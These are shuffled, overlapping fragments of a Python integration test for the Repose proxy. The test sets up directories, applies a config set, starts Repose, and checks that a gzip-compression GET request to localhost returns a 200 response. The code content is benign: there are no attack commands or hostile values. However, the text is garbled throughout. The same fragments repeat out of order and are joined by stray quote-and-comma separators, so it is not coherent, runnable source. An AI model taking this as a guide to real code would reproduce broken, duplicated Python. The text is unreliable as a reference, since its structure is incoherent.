pathutil.create_folder(config_dir) pathutil.create_folder(deployment_dir) pathutil.create_folder(os.path.dirname(log_file)) config_verbose = False def apply_config_set(config_set_name, params=None): if params", 
"test_cases_set.add(tc) test_cases.append(test_case_map[tc]) logger.debug('run') setUpModule() suite = unittest.TestSuite() loader = unittest.TestLoader() load_tests = loader.loadTestsFromTestCase", "conf.process_config_set(config_set_name, verbose=config_verbose, destination_path=config_dir, params=params) class TestCompression(unittest.TestCase): def setUp(self): logger.debug('setUp') self.deproxy = deproxy.Deproxy() self.end_point", "import os import deproxy logger = logging.getLogger(__name__) config_dir = pathutil.join(os.getcwd(), 'etc/repose') deployment_dir =", "= 15 def setUpModule(): # Set up folder hierarchy logger.debug('setUpModule') pathutil.create_folder(config_dir) pathutil.create_folder(deployment_dir) pathutil.create_folder(os.path.dirname(log_file))", "'deployment_dir': deployment_dir, 'artifact_dir': artifact_dir, 'log_file': log_file } apply_config_set('configs/.config-set.xml', params=params) self.valve = repose.ReposeValve(config_dir=config_dir, stop_port=stop_port)", "= pathutil.join(os.getcwd(), 'usr/share/repose/filters') log_file = pathutil.join(os.getcwd(), 'var/log/repose/current.log') repose_port = 8888 stop_port = 7777", "pathutil.create_folder(os.path.dirname(log_file)) config_verbose = False def apply_config_set(config_set_name, params=None): if params is None: params =", "logger.debug('test_compression_with_gzip') url = 'http://localhost:%i/' % repose_port logger.debug('url = %s' % url) time.sleep(1) mc", "= self.deproxy.make_request(method='GET', url=url, headers=headers) self.assertEqual(mc.received_response.code, '200', msg=mc) self.assertEqual(len(mc.handlings), 1, msg=mc) def tearDown(self): logger.debug('tearDown')", "available_test_cases = [ TestCompression ] def run(): test_case_map = dict() for tc_class in", "= [ TestCompression ] def run(): test_case_map = dict() for tc_class in available_test_cases:", "'%(funcName)s:' '%(filename)s(%(lineno)d):' '%(threadName)s(%(thread)d):%(message)s')) global config_verbose 
config_verbose = True if args.test_case is None: args.test_case", "is None: args.test_case = ['all'] test_cases = [] test_cases_set = set() for tc", "time import argparse import os import deproxy logger = logging.getLogger(__name__) config_dir = pathutil.join(os.getcwd(),", "\"multiple times. 'all' is the default, and runs all \" \"available test cases\",", "self.valve = repose.ReposeValve(config_dir=config_dir, stop_port=stop_port) time.sleep(startup_wait_time) def test_compression_with_gzip(self): logger.debug('test_compression_with_gzip') url = 'http://localhost:%i/' % repose_port", "not None: self.deproxy.shutdown_all_endpoints() available_test_cases = [ TestCompression ] def run(): test_case_map = dict()", "'target_port': deproxy_port, 'deployment_dir': deployment_dir, 'artifact_dir': artifact_dir, 'log_file': log_file } apply_config_set('configs/.config-set.xml', params=params) self.valve =", "params = {} conf.process_config_set(config_set_name, verbose=config_verbose, destination_path=config_dir, params=params) class TestCompression(unittest.TestCase): def setUp(self): logger.debug('setUp') self.deproxy", "= dict() for tc_class in available_test_cases: test_case_map[tc_class.__name__] = tc_class parser = argparse.ArgumentParser() parser.add_argument('--print-log',", "config_verbose = True if args.test_case is None: args.test_case = ['all'] test_cases = []", "test_case_map = dict() for tc_class in available_test_cases: test_case_map[tc_class.__name__] = tc_class parser = argparse.ArgumentParser()", "{} conf.process_config_set(config_set_name, verbose=config_verbose, destination_path=config_dir, params=params) class TestCompression(unittest.TestCase): def setUp(self): logger.debug('setUp') self.deproxy = deproxy.Deproxy()", "pathutil.clear_folder(config_dir) params = { 'port': repose_port, 'target_hostname': 'localhost', 'target_port': deproxy_port, 'deployment_dir': deployment_dir, 'artifact_dir':", "help=\"Print the log to STDERR.\", action='store_true') 
parser.add_argument('--test-case', action='append', help=\"Which test case to run.", "run. Can be specififed \" \"multiple times. 'all' is the default, and runs", "'artifact_dir': artifact_dir, 'log_file': log_file } apply_config_set('configs/.config-set.xml', params=params) self.valve = repose.ReposeValve(config_dir=config_dir, stop_port=stop_port) time.sleep(startup_wait_time) def", "Can be specififed \" \"multiple times. 'all' is the default, and runs all", "pathutil.join(os.getcwd(), 'usr/share/repose/filters') log_file = pathutil.join(os.getcwd(), 'var/log/repose/current.log') repose_port = 8888 stop_port = 7777 deproxy_port", "available_test_cases break if tc not in test_cases_set: test_cases_set.add(tc) test_cases.append(test_case_map[tc]) logger.debug('run') setUpModule() suite =", "repose.ReposeValve(config_dir=config_dir, stop_port=stop_port) time.sleep(startup_wait_time) def test_compression_with_gzip(self): logger.debug('test_compression_with_gzip') url = 'http://localhost:%i/' % repose_port logger.debug('url =", "= loader.loadTestsFromTestCase for test_case in test_cases: suite.addTest(load_tests(test_case)) testRunner = _xmlrunner.XMLTestRunner(output='test-reports') result = testRunner.run(suite)", "\" \"available test cases\", choices=['all'] + test_case_map.keys(), type=str) args = parser.parse_args() if args.print_log:", "test cases\", choices=['all'] + test_case_map.keys(), type=str) args = parser.parse_args() if args.print_log: logging.basicConfig(level=logging.DEBUG, format=('%(asctime)s", "['all'] test_cases = [] test_cases_set = set() for tc in args.test_case: if tc", "format=('%(asctime)s %(levelname)s:%(name)s:' '%(funcName)s:' '%(filename)s(%(lineno)d):' '%(threadName)s(%(thread)d):%(message)s')) global config_verbose config_verbose = True if args.test_case is", "[] test_cases_set = set() for tc in args.test_case: if tc == 'all': test_cases", "and runs all \" \"available test cases\", choices=['all'] + test_case_map.keys(), type=str) args 
=", "parser.parse_args() if args.print_log: logging.basicConfig(level=logging.DEBUG, format=('%(asctime)s %(levelname)s:%(name)s:' '%(funcName)s:' '%(filename)s(%(lineno)d):' '%(threadName)s(%(thread)d):%(message)s')) global config_verbose config_verbose =", "= unittest.TestSuite() loader = unittest.TestLoader() load_tests = loader.loadTestsFromTestCase for test_case in test_cases: suite.addTest(load_tests(test_case))", "= unittest.TestLoader() load_tests = loader.loadTestsFromTestCase for test_case in test_cases: suite.addTest(load_tests(test_case)) testRunner = _xmlrunner.XMLTestRunner(output='test-reports')", "deproxy.Deproxy() self.end_point = self.deproxy.add_endpoint(('localhost', deproxy_port)) pathutil.clear_folder(config_dir) params = { 'port': repose_port, 'target_hostname': 'localhost',", "params=None): if params is None: params = {} conf.process_config_set(config_set_name, verbose=config_verbose, destination_path=config_dir, params=params) class", "'port': repose_port, 'target_hostname': 'localhost', 'target_port': deproxy_port, 'deployment_dir': deployment_dir, 'artifact_dir': artifact_dir, 'log_file': log_file }", "= pathutil.join(os.getcwd(), 'var/log/repose/current.log') repose_port = 8888 stop_port = 7777 deproxy_port = 9999 headers", "self.deproxy.shutdown_all_endpoints() available_test_cases = [ TestCompression ] def run(): test_case_map = dict() for tc_class", "args.test_case: if tc == 'all': test_cases = available_test_cases break if tc not in", "%s' % url) time.sleep(1) mc = self.deproxy.make_request(method='GET', url=url, headers=headers) self.assertEqual(mc.received_response.code, '200', msg=mc) self.assertEqual(len(mc.handlings),", "pathutil.join(os.getcwd(), 'var/log/repose/current.log') repose_port = 8888 stop_port = 7777 deproxy_port = 9999 headers =", "'log_file': log_file } apply_config_set('configs/.config-set.xml', params=params) self.valve = repose.ReposeValve(config_dir=config_dir, stop_port=stop_port) time.sleep(startup_wait_time) 
def test_compression_with_gzip(self): logger.debug('test_compression_with_gzip')", "to run. Can be specififed \" \"multiple times. 'all' is the default, and", "'all': test_cases = available_test_cases break if tc not in test_cases_set: test_cases_set.add(tc) test_cases.append(test_case_map[tc]) logger.debug('run')", "import logging import time import argparse import os import deproxy logger = logging.getLogger(__name__)", "= deproxy.Deproxy() self.end_point = self.deproxy.add_endpoint(('localhost', deproxy_port)) pathutil.clear_folder(config_dir) params = { 'port': repose_port, 'target_hostname':", "= available_test_cases break if tc not in test_cases_set: test_cases_set.add(tc) test_cases.append(test_case_map[tc]) logger.debug('run') setUpModule() suite", "default, and runs all \" \"available test cases\", choices=['all'] + test_case_map.keys(), type=str) args", "msg=mc) def tearDown(self): logger.debug('tearDown') if self.valve is not None: self.valve.stop() if self.deproxy is", "in available_test_cases: test_case_map[tc_class.__name__] = tc_class parser = argparse.ArgumentParser() parser.add_argument('--print-log', help=\"Print the log to", "= { 'port': repose_port, 'target_hostname': 'localhost', 'target_port': deproxy_port, 'deployment_dir': deployment_dir, 'artifact_dir': artifact_dir, 'log_file':", "cases\", choices=['all'] + test_case_map.keys(), type=str) args = parser.parse_args() if args.print_log: logging.basicConfig(level=logging.DEBUG, format=('%(asctime)s %(levelname)s:%(name)s:'", "} apply_config_set('configs/.config-set.xml', params=params) self.valve = repose.ReposeValve(config_dir=config_dir, stop_port=stop_port) time.sleep(startup_wait_time) def test_compression_with_gzip(self): logger.debug('test_compression_with_gzip') url =", "test_compression_with_gzip(self): logger.debug('test_compression_with_gzip') url = 'http://localhost:%i/' % repose_port logger.debug('url = %s' % url) time.sleep(1)", "all \" \"available test cases\", choices=['all'] + 
test_case_map.keys(), type=str) args = parser.parse_args() if", "repose import unittest from narwhal import conf from narwhal import pathutil import xmlrunner", "pathutil.join(os.getcwd(), 'etc/repose') deployment_dir = pathutil.join(os.getcwd(), 'var/repose') artifact_dir = pathutil.join(os.getcwd(), 'usr/share/repose/filters') log_file = pathutil.join(os.getcwd(),", "available_test_cases: test_case_map[tc_class.__name__] = tc_class parser = argparse.ArgumentParser() parser.add_argument('--print-log', help=\"Print the log to STDERR.\",", "= 'http://localhost:%i/' % repose_port logger.debug('url = %s' % url) time.sleep(1) mc = self.deproxy.make_request(method='GET',", "repose_port logger.debug('url = %s' % url) time.sleep(1) mc = self.deproxy.make_request(method='GET', url=url, headers=headers) self.assertEqual(mc.received_response.code,", "the default, and runs all \" \"available test cases\", choices=['all'] + test_case_map.keys(), type=str)", "setUpModule(): # Set up folder hierarchy logger.debug('setUpModule') pathutil.create_folder(config_dir) pathutil.create_folder(deployment_dir) pathutil.create_folder(os.path.dirname(log_file)) config_verbose = False", "'%(threadName)s(%(thread)d):%(message)s')) global config_verbose config_verbose = True if args.test_case is None: args.test_case = ['all']", "global config_verbose config_verbose = True if args.test_case is None: args.test_case = ['all'] test_cases", "unittest from narwhal import conf from narwhal import pathutil import xmlrunner as _xmlrunner", "stop_port = 7777 deproxy_port = 9999 headers = {} startup_wait_time = 15 def", "self.deproxy = deproxy.Deproxy() self.end_point = self.deproxy.add_endpoint(('localhost', deproxy_port)) pathutil.clear_folder(config_dir) params = { 'port': repose_port,", "def run(): test_case_map = dict() for tc_class in available_test_cases: test_case_map[tc_class.__name__] = tc_class parser", "from narwhal import repose import unittest from narwhal import conf from narwhal import", 
"deproxy_port = 9999 headers = {} startup_wait_time = 15 def setUpModule(): # Set", "'target_hostname': 'localhost', 'target_port': deproxy_port, 'deployment_dir': deployment_dir, 'artifact_dir': artifact_dir, 'log_file': log_file } apply_config_set('configs/.config-set.xml', params=params)", "config_verbose config_verbose = True if args.test_case is None: args.test_case = ['all'] test_cases =", "choices=['all'] + test_case_map.keys(), type=str) args = parser.parse_args() if args.print_log: logging.basicConfig(level=logging.DEBUG, format=('%(asctime)s %(levelname)s:%(name)s:' '%(funcName)s:'", "time.sleep(1) mc = self.deproxy.make_request(method='GET', url=url, headers=headers) self.assertEqual(mc.received_response.code, '200', msg=mc) self.assertEqual(len(mc.handlings), 1, msg=mc) def", "None: self.deproxy.shutdown_all_endpoints() available_test_cases = [ TestCompression ] def run(): test_case_map = dict() for", "= parser.parse_args() if args.print_log: logging.basicConfig(level=logging.DEBUG, format=('%(asctime)s %(levelname)s:%(name)s:' '%(funcName)s:' '%(filename)s(%(lineno)d):' '%(threadName)s(%(thread)d):%(message)s')) global config_verbose config_verbose", "deployment_dir = pathutil.join(os.getcwd(), 'var/repose') artifact_dir = pathutil.join(os.getcwd(), 'usr/share/repose/filters') log_file = pathutil.join(os.getcwd(), 'var/log/repose/current.log') repose_port", "None: params = {} conf.process_config_set(config_set_name, verbose=config_verbose, destination_path=config_dir, params=params) class TestCompression(unittest.TestCase): def setUp(self): logger.debug('setUp')", "args.test_case = ['all'] test_cases = [] test_cases_set = set() for tc in args.test_case:", "config_dir = pathutil.join(os.getcwd(), 'etc/repose') deployment_dir = pathutil.join(os.getcwd(), 'var/repose') artifact_dir = pathutil.join(os.getcwd(), 'usr/share/repose/filters') log_file", "for tc in args.test_case: if tc == 'all': test_cases = available_test_cases break if", "'etc/repose') 
deployment_dir = pathutil.join(os.getcwd(), 'var/repose') artifact_dir = pathutil.join(os.getcwd(), 'usr/share/repose/filters') log_file = pathutil.join(os.getcwd(), 'var/log/repose/current.log')", "os import deproxy logger = logging.getLogger(__name__) config_dir = pathutil.join(os.getcwd(), 'etc/repose') deployment_dir = pathutil.join(os.getcwd(),", "pathutil.join(os.getcwd(), 'var/repose') artifact_dir = pathutil.join(os.getcwd(), 'usr/share/repose/filters') log_file = pathutil.join(os.getcwd(), 'var/log/repose/current.log') repose_port = 8888", "run(): test_case_map = dict() for tc_class in available_test_cases: test_case_map[tc_class.__name__] = tc_class parser =", "self.assertEqual(len(mc.handlings), 1, msg=mc) def tearDown(self): logger.debug('tearDown') if self.valve is not None: self.valve.stop() if", "pathutil.create_folder(deployment_dir) pathutil.create_folder(os.path.dirname(log_file)) config_verbose = False def apply_config_set(config_set_name, params=None): if params is None: params", "deproxy_port)) pathutil.clear_folder(config_dir) params = { 'port': repose_port, 'target_hostname': 'localhost', 'target_port': deproxy_port, 'deployment_dir': deployment_dir,", "= pathutil.join(os.getcwd(), 'var/repose') artifact_dir = pathutil.join(os.getcwd(), 'usr/share/repose/filters') log_file = pathutil.join(os.getcwd(), 'var/log/repose/current.log') repose_port =", "type=str) args = parser.parse_args() if args.print_log: logging.basicConfig(level=logging.DEBUG, format=('%(asctime)s %(levelname)s:%(name)s:' '%(funcName)s:' '%(filename)s(%(lineno)d):' '%(threadName)s(%(thread)d):%(message)s')) global", "= [] test_cases_set = set() for tc in args.test_case: if tc == 'all':", "= True if args.test_case is None: args.test_case = ['all'] test_cases = [] test_cases_set", "test_cases.append(test_case_map[tc]) logger.debug('run') setUpModule() suite = unittest.TestSuite() loader = unittest.TestLoader() load_tests = loader.loadTestsFromTestCase for", "config_verbose = 
False def apply_config_set(config_set_name, params=None): if params is None: params = {}", "apply_config_set(config_set_name, params=None): if params is None: params = {} conf.process_config_set(config_set_name, verbose=config_verbose, destination_path=config_dir, params=params)", "args.print_log: logging.basicConfig(level=logging.DEBUG, format=('%(asctime)s %(levelname)s:%(name)s:' '%(funcName)s:' '%(filename)s(%(lineno)d):' '%(threadName)s(%(thread)d):%(message)s')) global config_verbose config_verbose = True if", "dict() for tc_class in available_test_cases: test_case_map[tc_class.__name__] = tc_class parser = argparse.ArgumentParser() parser.add_argument('--print-log', help=\"Print", "logging.basicConfig(level=logging.DEBUG, format=('%(asctime)s %(levelname)s:%(name)s:' '%(funcName)s:' '%(filename)s(%(lineno)d):' '%(threadName)s(%(thread)d):%(message)s')) global config_verbose config_verbose = True if args.test_case", "import deproxy logger = logging.getLogger(__name__) config_dir = pathutil.join(os.getcwd(), 'etc/repose') deployment_dir = pathutil.join(os.getcwd(), 'var/repose')", "in args.test_case: if tc == 'all': test_cases = available_test_cases break if tc not", "STDERR.\", action='store_true') parser.add_argument('--test-case', action='append', help=\"Which test case to run. 
Can be specififed \"", "test_case in test_cases: suite.addTest(load_tests(test_case)) testRunner = _xmlrunner.XMLTestRunner(output='test-reports') result = testRunner.run(suite) if __name__ ==", "if self.deproxy is not None: self.deproxy.shutdown_all_endpoints() available_test_cases = [ TestCompression ] def run():", "8888 stop_port = 7777 deproxy_port = 9999 headers = {} startup_wait_time = 15", "logger.debug('tearDown') if self.valve is not None: self.valve.stop() if self.deproxy is not None: self.deproxy.shutdown_all_endpoints()", "time.sleep(startup_wait_time) def test_compression_with_gzip(self): logger.debug('test_compression_with_gzip') url = 'http://localhost:%i/' % repose_port logger.debug('url = %s' %", "= argparse.ArgumentParser() parser.add_argument('--print-log', help=\"Print the log to STDERR.\", action='store_true') parser.add_argument('--test-case', action='append', help=\"Which test", "logger.debug('run') setUpModule() suite = unittest.TestSuite() loader = unittest.TestLoader() load_tests = loader.loadTestsFromTestCase for test_case", "url = 'http://localhost:%i/' % repose_port logger.debug('url = %s' % url) time.sleep(1) mc =", "action='store_true') parser.add_argument('--test-case', action='append', help=\"Which test case to run. Can be specififed \" \"multiple", "test case to run. Can be specififed \" \"multiple times. 
'all' is the", "params=params) self.valve = repose.ReposeValve(config_dir=config_dir, stop_port=stop_port) time.sleep(startup_wait_time) def test_compression_with_gzip(self): logger.debug('test_compression_with_gzip') url = 'http://localhost:%i/' %", "test_cases = available_test_cases break if tc not in test_cases_set: test_cases_set.add(tc) test_cases.append(test_case_map[tc]) logger.debug('run') setUpModule()", "self.assertEqual(mc.received_response.code, '200', msg=mc) self.assertEqual(len(mc.handlings), 1, msg=mc) def tearDown(self): logger.debug('tearDown') if self.valve is not", "narwhal import pathutil import xmlrunner as _xmlrunner import logging import time import argparse", "params = { 'port': repose_port, 'target_hostname': 'localhost', 'target_port': deproxy_port, 'deployment_dir': deployment_dir, 'artifact_dir': artifact_dir,", "def tearDown(self): logger.debug('tearDown') if self.valve is not None: self.valve.stop() if self.deproxy is not", "def test_compression_with_gzip(self): logger.debug('test_compression_with_gzip') url = 'http://localhost:%i/' % repose_port logger.debug('url = %s' % url)", "folder hierarchy logger.debug('setUpModule') pathutil.create_folder(config_dir) pathutil.create_folder(deployment_dir) pathutil.create_folder(os.path.dirname(log_file)) config_verbose = False def apply_config_set(config_set_name, params=None): if", "setUp(self): logger.debug('setUp') self.deproxy = deproxy.Deproxy() self.end_point = self.deproxy.add_endpoint(('localhost', deproxy_port)) pathutil.clear_folder(config_dir) params = {", "parser = argparse.ArgumentParser() parser.add_argument('--print-log', help=\"Print the log to STDERR.\", action='store_true') parser.add_argument('--test-case', action='append', help=\"Which", "15 def setUpModule(): # Set up folder hierarchy logger.debug('setUpModule') pathutil.create_folder(config_dir) pathutil.create_folder(deployment_dir) pathutil.create_folder(os.path.dirname(log_file)) config_verbose", "if tc == 'all': 
test_cases = available_test_cases break if tc not in test_cases_set:", "'localhost', 'target_port': deproxy_port, 'deployment_dir': deployment_dir, 'artifact_dir': artifact_dir, 'log_file': log_file } apply_config_set('configs/.config-set.xml', params=params) self.valve", "\"available test cases\", choices=['all'] + test_case_map.keys(), type=str) args = parser.parse_args() if args.print_log: logging.basicConfig(level=logging.DEBUG,", "test_cases: suite.addTest(load_tests(test_case)) testRunner = _xmlrunner.XMLTestRunner(output='test-reports') result = testRunner.run(suite) if __name__ == '__main__': run()", "in test_cases_set: test_cases_set.add(tc) test_cases.append(test_case_map[tc]) logger.debug('run') setUpModule() suite = unittest.TestSuite() loader = unittest.TestLoader() load_tests", "'%(filename)s(%(lineno)d):' '%(threadName)s(%(thread)d):%(message)s')) global config_verbose config_verbose = True if args.test_case is None: args.test_case =", "None: self.valve.stop() if self.deproxy is not None: self.deproxy.shutdown_all_endpoints() available_test_cases = [ TestCompression ]", "conf from narwhal import pathutil import xmlrunner as _xmlrunner import logging import time", "False def apply_config_set(config_set_name, params=None): if params is None: params = {} conf.process_config_set(config_set_name, verbose=config_verbose,", "% url) time.sleep(1) mc = self.deproxy.make_request(method='GET', url=url, headers=headers) self.assertEqual(mc.received_response.code, '200', msg=mc) self.assertEqual(len(mc.handlings), 1,", "runs all \" \"available test cases\", choices=['all'] + test_case_map.keys(), type=str) args = parser.parse_args()", "tc not in test_cases_set: test_cases_set.add(tc) test_cases.append(test_case_map[tc]) logger.debug('run') setUpModule() suite = unittest.TestSuite() loader =", "logger.debug('url = %s' % url) time.sleep(1) mc = self.deproxy.make_request(method='GET', url=url, headers=headers) self.assertEqual(mc.received_response.code, '200',", 
"import time import argparse import os import deproxy logger = logging.getLogger(__name__) config_dir =", "import pathutil import xmlrunner as _xmlrunner import logging import time import argparse import", "suite = unittest.TestSuite() loader = unittest.TestLoader() load_tests = loader.loadTestsFromTestCase for test_case in test_cases:", "] def run(): test_case_map = dict() for tc_class in available_test_cases: test_case_map[tc_class.__name__] = tc_class", "headers=headers) self.assertEqual(mc.received_response.code, '200', msg=mc) self.assertEqual(len(mc.handlings), 1, msg=mc) def tearDown(self): logger.debug('tearDown') if self.valve is", "times. 'all' is the default, and runs all \" \"available test cases\", choices=['all']", "pathutil.create_folder(config_dir) pathutil.create_folder(deployment_dir) pathutil.create_folder(os.path.dirname(log_file)) config_verbose = False def apply_config_set(config_set_name, params=None): if params is None:", "logger = logging.getLogger(__name__) config_dir = pathutil.join(os.getcwd(), 'etc/repose') deployment_dir = pathutil.join(os.getcwd(), 'var/repose') artifact_dir =", "for tc_class in available_test_cases: test_case_map[tc_class.__name__] = tc_class parser = argparse.ArgumentParser() parser.add_argument('--print-log', help=\"Print the", "+ test_case_map.keys(), type=str) args = parser.parse_args() if args.print_log: logging.basicConfig(level=logging.DEBUG, format=('%(asctime)s %(levelname)s:%(name)s:' '%(funcName)s:' '%(filename)s(%(lineno)d):'", "xmlrunner as _xmlrunner import logging import time import argparse import os import deproxy", "None: args.test_case = ['all'] test_cases = [] test_cases_set = set() for tc in", "narwhal import repose import unittest from narwhal import conf from narwhal import pathutil", "if tc not in test_cases_set: test_cases_set.add(tc) test_cases.append(test_case_map[tc]) logger.debug('run') setUpModule() suite = unittest.TestSuite() loader", "deproxy_port, 'deployment_dir': deployment_dir, 
'artifact_dir': artifact_dir, 'log_file': log_file } apply_config_set('configs/.config-set.xml', params=params) self.valve = repose.ReposeValve(config_dir=config_dir,", "mc = self.deproxy.make_request(method='GET', url=url, headers=headers) self.assertEqual(mc.received_response.code, '200', msg=mc) self.assertEqual(len(mc.handlings), 1, msg=mc) def tearDown(self):", "= 7777 deproxy_port = 9999 headers = {} startup_wait_time = 15 def setUpModule():", "up folder hierarchy logger.debug('setUpModule') pathutil.create_folder(config_dir) pathutil.create_folder(deployment_dir) pathutil.create_folder(os.path.dirname(log_file)) config_verbose = False def apply_config_set(config_set_name, params=None):", "python from narwhal import repose import unittest from narwhal import conf from narwhal", "artifact_dir, 'log_file': log_file } apply_config_set('configs/.config-set.xml', params=params) self.valve = repose.ReposeValve(config_dir=config_dir, stop_port=stop_port) time.sleep(startup_wait_time) def test_compression_with_gzip(self):", "TestCompression ] def run(): test_case_map = dict() for tc_class in available_test_cases: test_case_map[tc_class.__name__] =", "destination_path=config_dir, params=params) class TestCompression(unittest.TestCase): def setUp(self): logger.debug('setUp') self.deproxy = deproxy.Deproxy() self.end_point = self.deproxy.add_endpoint(('localhost',", "'var/log/repose/current.log') repose_port = 8888 stop_port = 7777 deproxy_port = 9999 headers = {}", "= self.deproxy.add_endpoint(('localhost', deproxy_port)) pathutil.clear_folder(config_dir) params = { 'port': repose_port, 'target_hostname': 'localhost', 'target_port': deproxy_port,", "7777 deproxy_port = 9999 headers = {} startup_wait_time = 15 def setUpModule(): #", "url=url, headers=headers) self.assertEqual(mc.received_response.code, '200', msg=mc) self.assertEqual(len(mc.handlings), 1, msg=mc) def tearDown(self): logger.debug('tearDown') if self.valve", "parser.add_argument('--print-log', 
help=\"Print the log to STDERR.\", action='store_true') parser.add_argument('--test-case', action='append', help=\"Which test case to", "parser.add_argument('--test-case', action='append', help=\"Which test case to run. Can be specififed \" \"multiple times.", "be specififed \" \"multiple times. 'all' is the default, and runs all \"", "'http://localhost:%i/' % repose_port logger.debug('url = %s' % url) time.sleep(1) mc = self.deproxy.make_request(method='GET', url=url,", "argparse import os import deproxy logger = logging.getLogger(__name__) config_dir = pathutil.join(os.getcwd(), 'etc/repose') deployment_dir", "9999 headers = {} startup_wait_time = 15 def setUpModule(): # Set up folder", "params is None: params = {} conf.process_config_set(config_set_name, verbose=config_verbose, destination_path=config_dir, params=params) class TestCompression(unittest.TestCase): def", "= set() for tc in args.test_case: if tc == 'all': test_cases = available_test_cases", "tc == 'all': test_cases = available_test_cases break if tc not in test_cases_set: test_cases_set.add(tc)", "log_file } apply_config_set('configs/.config-set.xml', params=params) self.valve = repose.ReposeValve(config_dir=config_dir, stop_port=stop_port) time.sleep(startup_wait_time) def test_compression_with_gzip(self): logger.debug('test_compression_with_gzip') url", "tc_class parser = argparse.ArgumentParser() parser.add_argument('--print-log', help=\"Print the log to STDERR.\", action='store_true') parser.add_argument('--test-case', action='append',", "tearDown(self): logger.debug('tearDown') if self.valve is not None: self.valve.stop() if self.deproxy is not None:", "1, msg=mc) def tearDown(self): logger.debug('tearDown') if self.valve is not None: self.valve.stop() if self.deproxy", "test_cases = [] test_cases_set = set() for tc in args.test_case: if tc ==", "from narwhal import conf from narwhal import pathutil import xmlrunner as _xmlrunner import", "import argparse import os import deproxy logger = 
logging.getLogger(__name__) config_dir = pathutil.join(os.getcwd(), 'etc/repose')", "'usr/share/repose/filters') log_file = pathutil.join(os.getcwd(), 'var/log/repose/current.log') repose_port = 8888 stop_port = 7777 deproxy_port =", "self.deproxy.add_endpoint(('localhost', deproxy_port)) pathutil.clear_folder(config_dir) params = { 'port': repose_port, 'target_hostname': 'localhost', 'target_port': deproxy_port, 'deployment_dir':", "loader = unittest.TestLoader() load_tests = loader.loadTestsFromTestCase for test_case in test_cases: suite.addTest(load_tests(test_case)) testRunner =", "class TestCompression(unittest.TestCase): def setUp(self): logger.debug('setUp') self.deproxy = deproxy.Deproxy() self.end_point = self.deproxy.add_endpoint(('localhost', deproxy_port)) pathutil.clear_folder(config_dir)", "= 8888 stop_port = 7777 deproxy_port = 9999 headers = {} startup_wait_time =", "= False def apply_config_set(config_set_name, params=None): if params is None: params = {} conf.process_config_set(config_set_name,", "verbose=config_verbose, destination_path=config_dir, params=params) class TestCompression(unittest.TestCase): def setUp(self): logger.debug('setUp') self.deproxy = deproxy.Deproxy() self.end_point =", "def setUp(self): logger.debug('setUp') self.deproxy = deproxy.Deproxy() self.end_point = self.deproxy.add_endpoint(('localhost', deproxy_port)) pathutil.clear_folder(config_dir) params =", "logging import time import argparse import os import deproxy logger = logging.getLogger(__name__) config_dir", "the log to STDERR.\", action='store_true') parser.add_argument('--test-case', action='append', help=\"Which test case to run. 
Can", "repose_port = 8888 stop_port = 7777 deproxy_port = 9999 headers = {} startup_wait_time", "tc in args.test_case: if tc == 'all': test_cases = available_test_cases break if tc", "in test_cases: suite.addTest(load_tests(test_case)) testRunner = _xmlrunner.XMLTestRunner(output='test-reports') result = testRunner.run(suite) if __name__ == '__main__':", "= 9999 headers = {} startup_wait_time = 15 def setUpModule(): # Set up", "apply_config_set('configs/.config-set.xml', params=params) self.valve = repose.ReposeValve(config_dir=config_dir, stop_port=stop_port) time.sleep(startup_wait_time) def test_compression_with_gzip(self): logger.debug('test_compression_with_gzip') url = 'http://localhost:%i/'", "= ['all'] test_cases = [] test_cases_set = set() for tc in args.test_case: if", "def setUpModule(): # Set up folder hierarchy logger.debug('setUpModule') pathutil.create_folder(config_dir) pathutil.create_folder(deployment_dir) pathutil.create_folder(os.path.dirname(log_file)) config_verbose =", "test_case_map.keys(), type=str) args = parser.parse_args() if args.print_log: logging.basicConfig(level=logging.DEBUG, format=('%(asctime)s %(levelname)s:%(name)s:' '%(funcName)s:' '%(filename)s(%(lineno)d):' '%(threadName)s(%(thread)d):%(message)s'))", "= logging.getLogger(__name__) config_dir = pathutil.join(os.getcwd(), 'etc/repose') deployment_dir = pathutil.join(os.getcwd(), 'var/repose') artifact_dir = pathutil.join(os.getcwd(),", "startup_wait_time = 15 def setUpModule(): # Set up folder hierarchy logger.debug('setUpModule') pathutil.create_folder(config_dir) pathutil.create_folder(deployment_dir)", "pathutil import xmlrunner as _xmlrunner import logging import time import argparse import os", "logging.getLogger(__name__) config_dir = pathutil.join(os.getcwd(), 'etc/repose') deployment_dir = pathutil.join(os.getcwd(), 'var/repose') artifact_dir = pathutil.join(os.getcwd(), 'usr/share/repose/filters')", "import unittest from narwhal import conf from narwhal import 
pathutil import xmlrunner as", "stop_port=stop_port) time.sleep(startup_wait_time) def test_compression_with_gzip(self): logger.debug('test_compression_with_gzip') url = 'http://localhost:%i/' % repose_port logger.debug('url = %s'", "test_cases_set = set() for tc in args.test_case: if tc == 'all': test_cases =", "headers = {} startup_wait_time = 15 def setUpModule(): # Set up folder hierarchy", "argparse.ArgumentParser() parser.add_argument('--print-log', help=\"Print the log to STDERR.\", action='store_true') parser.add_argument('--test-case', action='append', help=\"Which test case", "[ TestCompression ] def run(): test_case_map = dict() for tc_class in available_test_cases: test_case_map[tc_class.__name__]", "if self.valve is not None: self.valve.stop() if self.deproxy is not None: self.deproxy.shutdown_all_endpoints() available_test_cases", "msg=mc) self.assertEqual(len(mc.handlings), 1, msg=mc) def tearDown(self): logger.debug('tearDown') if self.valve is not None: self.valve.stop()", "self.end_point = self.deproxy.add_endpoint(('localhost', deproxy_port)) pathutil.clear_folder(config_dir) params = { 'port': repose_port, 'target_hostname': 'localhost', 'target_port':", "url) time.sleep(1) mc = self.deproxy.make_request(method='GET', url=url, headers=headers) self.assertEqual(mc.received_response.code, '200', msg=mc) self.assertEqual(len(mc.handlings), 1, msg=mc)", "self.deproxy.make_request(method='GET', url=url, headers=headers) self.assertEqual(mc.received_response.code, '200', msg=mc) self.assertEqual(len(mc.handlings), 1, msg=mc) def tearDown(self): logger.debug('tearDown') if", "True if args.test_case is None: args.test_case = ['all'] test_cases = [] test_cases_set =", "{ 'port': repose_port, 'target_hostname': 'localhost', 'target_port': deproxy_port, 'deployment_dir': deployment_dir, 'artifact_dir': artifact_dir, 'log_file': log_file", "'200', msg=mc) self.assertEqual(len(mc.handlings), 1, msg=mc) def tearDown(self): logger.debug('tearDown') if 
